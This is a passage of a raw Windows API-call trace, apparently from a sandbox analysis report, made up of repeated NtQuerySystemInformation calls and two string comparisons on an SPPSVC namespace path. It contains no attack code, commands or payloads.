SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0215.678] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0215.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0215.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0215.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0215.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0215.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0215.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0215.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0215.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0215.691] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0215.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0215.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0215.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0215.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0215.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0216.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0216.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0216.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0216.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0216.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0216.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0216.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0216.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0216.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x28, ResultLength=0x0) [0216.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0216.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0216.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0216.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x20, ResultLength=0x0) [0216.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0216.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0216.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x20, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0216.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0216.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0216.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0216.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0216.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0216.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0216.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0216.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0216.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0216.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0216.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0216.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0216.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, 